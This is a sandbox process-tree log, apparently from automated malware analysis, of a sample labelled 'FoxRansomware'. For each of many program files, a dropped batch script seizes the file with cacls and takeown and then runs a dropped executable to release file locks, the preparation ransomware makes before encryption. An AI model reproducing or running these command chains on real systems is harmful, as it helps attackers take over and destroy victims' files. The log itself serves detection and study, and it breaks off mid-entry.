C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵
- Loads dropped DLL
PID:1476 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:2720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵
- Loads dropped DLL
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵
- Executes dropped EXE
PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵
- Loads dropped DLL
PID:2480 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵
- Loads dropped DLL
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵
- Executes dropped EXE
PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵
- Loads dropped DLL
PID:1448 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:2296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can03.ths" -nobanner3⤵
- Loads dropped DLL
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can03.ths" -nobanner4⤵
- Executes dropped EXE
PID:2264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵
- Loads dropped DLL
PID:2360 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:2928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:2324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵
- Loads dropped DLL
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵
- Executes dropped EXE
PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵
- Loads dropped DLL
PID:2104 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:2976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ROMAN.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ROMAN.TXT" -nobanner4⤵
- Executes dropped EXE
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵
- Loads dropped DLL
PID:1028 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:1500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:2696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1257.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1257.TXT" -nobanner4⤵
- Executes dropped EXE
PID:472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵
- Loads dropped DLL
PID:1940 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "superbar.png" -nobanner3⤵
- Loads dropped DLL
PID:668 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "superbar.png" -nobanner4⤵
- Executes dropped EXE
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵
- Loads dropped DLL
PID:1596 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:1656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:320 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵
- Loads dropped DLL
PID:2784 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "watermark.png" -nobanner3⤵
- Loads dropped DLL
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:2616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵
- Loads dropped DLL
PID:2836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:2820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:2572 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:3108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵
- Loads dropped DLL
PID:3164 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3384 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:3428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3084 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3132 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:3516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵
- Loads dropped DLL
PID:3208 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:3236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "FreeCellMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3264 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "FreeCellMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵
- Loads dropped DLL
PID:3296 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:3468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "HeartsMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "HeartsMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵
- Loads dropped DLL
PID:3556 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:3260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:3560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "br.gif" -nobanner3⤵
- Loads dropped DLL
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "br.gif" -nobanner4⤵
- Executes dropped EXE
PID:3804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:3836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:3864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵
- Modifies file permissions
PID:3880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "form_responses.gif" -nobanner3⤵PID:3884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "form_responses.gif" -nobanner4⤵
- Executes dropped EXE
PID:3652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:3660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:3748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_email.gif" -nobanner3⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "review_email.gif" -nobanner4⤵PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:4084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:4112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:4132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tr.gif" -nobanner3⤵PID:4140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tr.gif" -nobanner4⤵PID:3948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:3616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:3620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:3544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:3752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:4156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:4164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:3988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:3992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:4288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:4000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:4004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:4100
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:4172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:4200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:4216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can.fca" -nobanner3⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can.fca" -nobanner4⤵PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:4268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:4052
-
-
